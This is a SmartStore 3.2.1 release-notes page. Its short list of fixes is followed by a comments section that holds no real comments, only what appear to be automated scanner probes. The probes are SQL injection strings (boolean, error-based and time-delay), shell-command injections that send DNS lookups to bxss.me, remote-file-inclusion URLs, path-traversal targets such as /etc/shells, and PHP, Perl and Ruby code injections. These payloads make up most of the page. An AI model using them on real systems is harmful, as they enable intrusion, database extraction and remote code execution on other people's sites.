Monday, May 27, 2019
SmartStore version 3.2.1
Improvements
- Implemented file range support for CachedFileResult
- Sitemap should only include products visible for current customer, which is the search engine system customer
- Fixed uniform spelling for query string parameter "returnUrl"
- Fixed search engine issue (itemtype, "offers" required) on product detail page
- Summernote: solved html formatting issues thanks to "Beautifier" library
- Media middleware: simplified ETag generation & handling
Bugfixes
- Mega Menu: Product rotator wasn't working
- Tiny Image: Fixed periodic IOException
- URL Rewriter: performance optimization
- Fixed more menu for main catalog navigation
- Fixed DateTime nor expressed as UTC in AzureFile & LocalFile
- Content Slider: Fixed slide display bug on surface and other touch devices
- Content Slider: Randomize slides > Value was stored in database but toggle button has always shown "off"
- Page Builder: Fixed slider bug for list blocks (brand, category, products) in Firefox
- Page Builder: fixes blurry background images in IOS
- Output Cache: action widgets didn't render when they were part of a widgetzone within a donut child action
- Multishop resolution failed under certain circumstances
- Fixed menu issue "collection was modified, enumeration operation may not execute"
- Fixed "The parameters dictionary contains a null entry for parameter 'catId' of non-nullable type 'System.Int32'"
- Fixed discount coupon sometimes wasn't applied
- Fixed "Value cannot be null. Parameter name: key" in order list
- Fixed topic link resolving by system name in multistore environment
- Async event consumers were not guaranteed to be awaited
Comments (146)
3
3
3
3
3
hTTp://r87.com/n
3
http://r87.com/n? .php
3
http://r87.com/n?.php
3
ns:netsparker056650=vuln
3
php://filter//resource=http://r87.com/n? .php
3
r87.com/n
3
http://example.com/?
ns: netsparker056650=vuln
3
ns:netsparker056650=vuln
3
ns:netsparker056650=vuln
3
1 OR 1=1
3
1 OR 1=1
3
'
3
NS
NO
3
AND 'NS='ss
3
' OR 1=1 OR 'ns'='ns
3
1 OR 17-7=10
3
OR X='ss
3
' OR 1=1 OR '1'='1
3
' OR 1=1 OR '1'='1
3
1 OR 1=1
3
1 OR 1=1
3
'
3
NS
NO
3
%27
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
AND 'NS='ss
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
' OR 1=1 OR 'ns'='ns
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
1 OR 17-7=10
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
OR X='ss
3
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
' OR 1=1 OR '1'='1
3
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
' OR 1=1 OR '1'='1
3
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
3
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
3
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
3
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
3
NSFTW
3
'+NSFTW+'
3
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
3
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
3
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
' WAITFOR DELAY '0:0:25'--
3
1 WAITFOR DELAY '0:0:25'--
3
WAITFOR DELAY '0:0:25'--
3
1) WAITFOR DELAY '0:0:25'--
3
') WAITFOR DELAY '0:0:25'--
3
')) WAITFOR DELAY '0:0:25'--
3
1)) WAITFOR DELAY '0:0:25'--
3
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
3
((select sleep(25)))a-- 1
3
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
3
';SELECT pg_sleep(25)--
3
;SELECT pg_sleep(25)--
3
SELECT pg_sleep(25)--
3
);SELECT pg_sleep(25)--
3
');SELECT pg_sleep(25)--
3
'));SELECT pg_sleep(25)--
3
));SELECT pg_sleep(25)--
3
((SELECT 1 FROM (SELECT SLEEP(25))A))
3
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
3
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
3
3
3
3
4
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
3
Mr.
response.write(9512332*9319861)
Mr.
'+response.write(9512332*9319861)+'
Mr.
"+response.write(9512332*9319861)+"
Mr.
echo zgbukp$()\ uzyfey\nz^xyu||a #' &echo zgbukp$()\ uzyfey\nz^xyu||a #|" &echo zgbukp$()\ uzyfey\nz^xyu||a #
Mr.
&echo svyijh$()\ kxluuc\nz^xyu||a #' &echo svyijh$()\ kxluuc\nz^xyu||a #|" &echo svyijh$()\ kxluuc\nz^xyu||a #
Mr.
|echo wadann$()\ jpmbqi\nz^xyu||a #' |echo wadann$()\ jpmbqi\nz^xyu||a #|" |echo wadann$()\ jpmbqi\nz^xyu||a #
Mr.
(nslookup hitjpidrtnuvaf2b3a.bxss.me||perl -e "gethostbyname('hitjpidrtnuvaf2b3a.bxss.me')")
Mr.
$(nslookup hitsjxmxenpgxdb8c2.bxss.me||perl -e "gethostbyname('hitsjxmxenpgxdb8c2.bxss.me')")
Mr.
&(nslookup hitdxjdkjsehx94484.bxss.me||perl -e "gethostbyname('hitdxjdkjsehx94484.bxss.me')")&'\"`0&(nslookup hitdxjdkjsehx94484.bxss.me||perl -e "gethostbyname('hitdxjdkjsehx94484.bxss.me')")&`'
Mr.
|(nslookup hitcptezddxfsbf2f4.bxss.me||perl -e "gethostbyname('hitcptezddxfsbf2f4.bxss.me')")
Mr.
`(nslookup hitxguljrzrsud95ad.bxss.me||perl -e "gethostbyname('hitxguljrzrsud95ad.bxss.me')")`
Mr.
;(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")|(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")&(nslookup hitoxauedewly56bc0.bxss.me||perl -e "gethostbyname('hitoxauedewly56bc0.bxss.me')")
Mr.
-1 OR 2+659-659-1=0+0+0+1 --
Mr.
-1 OR 3+659-659-1=0+0+0+1 --
Mr.
-1 OR 2+204-204-1=0+0+0+1
Mr.
-1 OR 3+204-204-1=0+0+0+1
Mr.
-1' OR 2+925-925-1=0+0+0+1 --
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Mr.
-1' OR 3+925-925-1=0+0+0+1 --
Mr.
Http://bxss.me/t/fit.txt
Mr.
-1' OR 2+571-571-1=0+0+0+1 or 'odx7QpyU'='
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
/etc/shells
Mr.
c:/windows/win.ini
Mr.
-1' OR 3+571-571-1=0+0+0+1 or 'odx7QpyU'='
Mr.
-1" OR 2+792-792-1=0+0+0+1 --
Mr.
-1" OR 3+792-792-1=0+0+0+1 --
Mr.
bxss.me
Mr.
'.gethostbyname(lc('hitmm'.'wdgwzzut653f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(81).chr(118).chr(77).'
Mr.
".gethostbyname(lc("hitxl"."spwzkwhj575ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(69).chr(101).chr(65)."
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
"+"A".concat(70-3).concat(22*4).concat(122).concat(65).concat(120).concat(81)+(require"socket"
Socket.gethostbyname("hitkv"+"uhtlfonia78da.bxss.me.")[3].to_s)+"
Mr.
';print(md5(31337));$a='
Mr.
'+'A'.concat(70-3).concat(22*4).concat(102).concat(87).concat(108).concat(83)+(require'socket'
Socket.gethostbyname('hityf'+'rpwdqbrz9118a.bxss.me.')[3].to_s)+'
Mr.
";print(md5(31337));$a="
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
LeAcPUkI'; waitfor delay '0:0:15' --
Mr.
cIJaLyS0'); waitfor delay '0:0:15' --
Mr.
mPaDYz0K')); waitfor delay '0:0:15' --
Mr.
-5 OR 428=(SELECT 428 FROM PG_SLEEP(15))--
Mr.
-5) OR 560=(SELECT 560 FROM PG_SLEEP(15))--
Mr.
-1)) OR 314=(SELECT 314 FROM PG_SLEEP(15))--
Mr.
W4bSTjsX' OR 217=(SELECT 217 FROM PG_SLEEP(15))--
Mr.
EfqIUaQC') OR 137=(SELECT 137 FROM PG_SLEEP(15))--
Mr.
9KTKZyV6')) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@3n4Pp